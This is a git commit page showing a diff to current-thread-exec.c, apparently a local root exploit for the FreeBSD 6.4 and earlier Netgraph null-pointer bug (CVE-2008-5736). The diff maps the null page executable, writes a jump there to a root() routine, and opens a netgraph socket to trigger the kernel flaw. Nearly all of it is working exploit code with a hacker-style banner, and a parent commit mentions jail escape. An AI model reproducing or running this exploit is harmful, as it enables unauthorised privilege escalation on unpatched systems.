author | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-27 01:48:51 -0500 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-27 01:48:51 -0500 |
commit | 83ff9d1ee5964795911c113fb8962de91e58398e (patch) | |
tree | a244abe889e308cada22806d8fe674536820f1dd | |
parent | Non functional jail escape functionality. (diff) | |
download | CVE-2008-5736-83ff9d1ee5964795911c113fb8962de91e58398e.tar.xz CVE-2008-5736-83ff9d1ee5964795911c113fb8962de91e58398e.zip |
Don't copy. Just jmp to function.
-rw-r--r-- | current-thread-exec.c | 31 |
1 files changed, 6 insertions, 25 deletions
diff --git a/current-thread-exec.c b/current-thread-exec.c
index cd6bd1d..01f9acc 100644
--- a/current-thread-exec.c
+++ b/current-thread-exec.c
@@ -90,42 +90,23 @@ int root(void)
 int main(int argc, char *argv[])
 {
- unsigned char *c;
- unsigned char *d;
- void *v;
- int s;
-
 fprintf(stderr, "~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n");
 fprintf(stderr, "~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n");
 fprintf(stderr, "~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n");
 fprintf(stderr, "[+] mmapping null page\n");
- v = mmap(
- NULL,
- PAGES * PAGE_SIZE,
- PROT_READ | PROT_WRITE | PROT_EXEC,
- MAP_ANON | MAP_FIXED,
- -1,
- 0);
- if (v == MAP_FAILED) {
+ if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) {
 perror("[-] mmap failed");
 return -1;
 }
- fprintf(stderr, "[+] copying pwnage into null page\n");
- c = v;
- d = (unsigned char*)root;
- while (1) {
- *c = *d;
- if (*d == 0xc3)
- break;
- d++;
- c++;
- }
- *c++ = 0xc3;
+ fprintf(stderr, "[+] adding jmp to pwnage in null page\n");
+ *(char*)0x0 = 0x90;
+ *(char*)0x1 = 0xe9;
+ *(unsigned long*)0x2 = (unsigned long)&root;
 fprintf(stderr, "[+] opening netgraph socket\n");
- s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
+ int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
 if (s < 0) {
 perror("[-] failed to open netgraph socket");
 return -1;
|